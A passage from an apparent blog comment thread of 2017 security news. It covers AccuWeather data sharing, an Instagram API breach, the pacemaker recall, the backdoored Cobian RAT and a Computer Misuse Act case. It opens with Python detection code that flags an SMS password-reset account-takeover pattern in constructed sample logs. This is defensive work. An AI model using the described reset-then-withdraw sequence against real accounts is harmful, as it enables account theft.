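    candidate for holding withdrawals and notifying the owner through a
    non-SMS channel before the actions take effect."""
    by_user: dict[str, list[AuthEvent]] = {}
    for e in sorted(events, key=lambda e: e.ts):
        by_user.setdefault(e.user, []).append(e)

    hits: dict[str, list[str]] = {}
    for user, evs in by_user.items():
        for i, e in enumerate(evs):
            if e.action == "password_reset" and e.channel == "sms":
                followers = [f.action for f in evs[i + 1:]
                             if f.ts - e.ts <= window and f.action in HIGH_RISK_ACTIONS]
                if followers:
                    hits[user] = followers
                    break
    return hits


# Constructed sample data: alice is taken over in the described pattern,
# bob's later withdrawal is outside the window, carol reset via hardware key.
SAMPLE_LOG = """\
2017-08-21T14:00:05Z user=alice action=login channel=password
2017-08-21T14:02:10Z user=alice action=password_reset channel=sms
2017-08-21T14:03:40Z user=alice action=recovery_email_changed channel=password
2017-08-21T14:05:02Z user=alice action=withdrawal channel=password
2017-08-21T15:10:00Z user=bob action=password_reset channel=sms
2017-08-22T09:30:00Z user=bob action=withdrawal channel=password
2017-08-21T16:00:00Z user=carol action=password_reset channel=hw_key
2017-08-21T16:01:00Z user=carol action=withdrawal channel=password
"""

SAMPLE_ACCOUNTS = {
    "alice": {"sms"},
    "bob": {"sms", "totp"},
    "carol": {"hw_key"},
}

if __name__ == "__main__":
    print("SMS-only recovery:", flag_sms_only_recovery(SAMPLE_ACCOUNTS))
    print("Reset bursts:", detect_sms_reset_burst(parse_log(SAMPLE_LOG)))
```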
  44. Tomi Engdahl says:

    AccuWeather Still Sharing User Data Without Consent Despite Update
    AccuWeather previously shipped an update to stop data collection
    http://news.softpedia.com/news/accuweather-still-sharing-user-data-without-consent-despite-update-517514.shtml

    You wouldn’t normally expect a company the size of AccuWeather to be involved in such a scandal, but it looks like the firm wasn’t saying the whole truth earlier this week when it promised to address claims of privacy violations by its iOS client.

    Research has shown that despite an update released a couple of days ago, AccuWeather for iOS still shares user data without consent, even though the company specifically promised to address this problem.

    Earlier this week, security researcher Will Strafach discovered that AccuWeather for iOS was sharing some user data with a data monetization firm called Reveal Mobile even when location sharing was disabled. AccuWeather published an update on Thursday and issued a public apology, emphasizing the company considers user privacy a priority and promising not to collect data without consent ever again.

    And yet, despite the update, it turns out that AccuWeather is still sharing some user data with an advertiser, again without users giving their consent.

  45. Tomi Engdahl says:

    Todd Spangler / Variety:
    Instagram says some high-profile accounts have been breached, exposing phone numbers and email addresses via a bug in the API, now fixed — Instagram said at least one hacker was able to steal personal information from high-profile user accounts, blaming the breach on a bug in its system that has now been fixed.

    Instagram Says Hackers Obtained ‘High-Profile’ Users’ Email Addresses, Phone Numbers
    http://variety.com/2017/digital/news/instagram-hackers-obtained-users-email-addresses-phone-numbers-1202543339/

    Instagram said at least one hacker was able to steal personal information from high-profile user accounts, blaming the breach on a bug in its system that has now been fixed.

    “We recently discovered that one or more individuals obtained unlawful access to a number of high-profile Instagram users’ contact information – specifically email address and phone number — by exploiting a bug in an Instagram API,” a rep said in a statement.

    Instagram said no account passwords were exposed, and that it has corrected the bug that allowed the information to be stolen. The glitch in Instagram’s application programming interface made it possible for someone to obtain a set of code that possibly contained email addresses and phone numbers of targeted user accounts.

    The Facebook-owned service said it believes the hack was aimed at “high-profile users” and that it has notified verified account holders of the issue. An Instagram rep declined to disclose which accounts may have been compromised.

  46. Tomi Engdahl says:

    Hacking risk leads to recall of 500,000 pacemakers due to patient death fears
    https://www.theguardian.com/technology/2017/aug/31/hacking-risk-recall-pacemakers-patient-death-fears-fda-firmware-update

    FDA overseeing crucial firmware update in US to patch security holes and prevent hijacking of pacemakers implanted in half a million people

    Almost half a million pacemakers have been recalled by the US Food and Drug Administration (FDA) due to fears that their lax cybersecurity could be hacked to run the batteries down or even alter the patient’s heartbeat.

    The recall won’t see the pacemakers removed, which would be an invasive and dangerous medical procedure for the 465,000 people who have them implanted: instead, the manufacturer has issued a firmware update which will be applied by medical staff to patch the security holes.

    Six types of pacemaker, all made by healthtech firm Abbott and sold under the St Jude Medical brand, are affected by the recall. They are all radio-controlled implantable cardiac pacemakers, typically fitted to patients with slow or irregular heartbeats, as well as those recovering from heart failure.

    There have been no reports of unauthorised access to any patient’s implanted device, according to Abbott. The FDA says that the vulnerability allows an unauthorised user to access a device using commercially available equipment and reprogram it. The hackers could then deliberately run the battery flat, or conduct “administration of inappropriate pacing”. Both could, in the worst case, result in the death of an affected patient.

    The US Department of Homeland Security said that “it is recommended that healthcare providers discuss this update with their patients and carefully consider the potential risk of a cybersecurity attack along with the risk of performing a firmware update”.

  47. Tomi Engdahl says:

    Cyber-flaw affects 745,000 pacemakers
    http://www.bbc.com/news/amp/technology-41099867

    A total of 745,000 pacemakers have been confirmed as having cyber-security issues that could let them be hacked.

    The Food and Drug Administration revealed that 465,000 pacemakers in the US were affected, in an advisory note about a fix to the problem.

    The pacemaker’s manufacturer, Abbott, told the BBC there were a further 280,000 devices elsewhere.

    The flaws could theoretically be used to cause the devices to pace too quickly or run down their batteries.

    However, Abbott said it was not aware of any cases of this happening, adding that it would require a “highly complex set of circumstances”.

    The Department of Homeland Security has said that an attacker would need “high skill” to exploit the vulnerabilities.

    Pacemakers manufactured after 28 August will come with the new firmware pre-installed.

    “As with any firmware update, there is a very low risk of an update malfunction,” the FDA said.

    The regulator noted a very small number of St Jude devices had lost all functionality after a firmware update in the past.

    Abbott said some patients might opt to continue with the old firmware as a consequence.

  48. Tomi Engdahl says:

    US government: We can jail you indefinitely for not decrypting your data
    Ex-cop in child abuse case approaching 2 years in the clink
    https://www.theregister.co.uk/2017/08/30/ex_cop_jailed_for_not_decrypting_data/?mt=1504175878929

    The US government is fighting to keep a former police officer in prison because he claims not to be able to remember the code to decrypt two hard drives under investigation.

    Francis Rawls, a former sergeant in the Philadelphia police department, has spent nearly two years in prison for contempt of court after refusing to provide the passcode for two hard drives that were taken from his house in 2015 during an investigation into child abuse images.

    Rawls claims he can’t remember the passcode for the two drives, encrypted using Apple’s FileVault system. The government says that he’s stalling because he fears that the contents could see him in serious trouble with his former employers.

    It says that they are not asking him for his decryption keys per se – they’re simply saying he needs to perform the physical act of decrypting the drives and he’s free to go. The government is also arguing that, as Rawls didn’t use his Fifth Amendment rights in his initial appeal, he can’t try to use that defense now.

  49. Tomi Engdahl says:

    Malware writer offers free trojan to hackers, with one small drawback
    Beware of geeks bearing Cobian RAT gifts
    https://www.theregister.co.uk/2017/08/31/free_trojan_for_hackers/

    Those looking on the dark web for malware capable of hijacking computers might have thought they were getting a bargain when a free trojan appeared on various online souks over the past few months.

    The malware generator, dubbed the Cobian remote access trojan (RAT) by researchers at security shop Zscaler, is a fairly elemental bit of code and is based around the njRAT that surfaced around four years ago. It comes with all the usual bells and whistles – a keylogger, webcam hijacker, screen capturing and the ability to run your own code on an infected system.

    But the Cobian RAT also has a secondary payload built in, hidden in an encrypted library. Once activated, it allows the original author of the malware to take control of any computers infected by the attack code and, if necessary, cut off the criminal who caused the infection in the first place.

    “It is ironic to see that the second level operators, who are using this kit to spread malware and steal from the end user, are getting duped themselves by the original author,”

  50. Tomi Engdahl says:

    Ex-Harrods IT worker pleads guilty to PC repair shop trip
    Hitchin man tried to have company-issued laptop taken off store’s domain
    https://www.theregister.co.uk/2017/08/30/ex_harrods_man_pardeep_parmar_computer_misuse_plea/

    A former Harrods IT worker has pleaded guilty to a charge under the Computer Misuse Act of trying to get a computer repair shop to take his company-issued laptop off the Harrods domain.

    taken the laptop to a local computer repair shop in Hitchin and asking workers there to remove it from the domain of the posh London emporium.

    Prosecutors said this amounts to the criminal offence of “causing a computer to perform a function to secure or enable unauthorised access to a program or data”, contrary to sections 1(1) and (3) of the Computer Misuse Act 1990.

    Defending the 30-year-old, Sundeep Pankhania of Marylebone solicitors’ firm HP Gower said his client had done this to try and save some personal files on his company-issued laptop, including his National Insurance number, and wanted to get access to those.

    The former Harrods worker also pleaded not guilty to stealing the Dell laptop from the Knightsbridge department store.

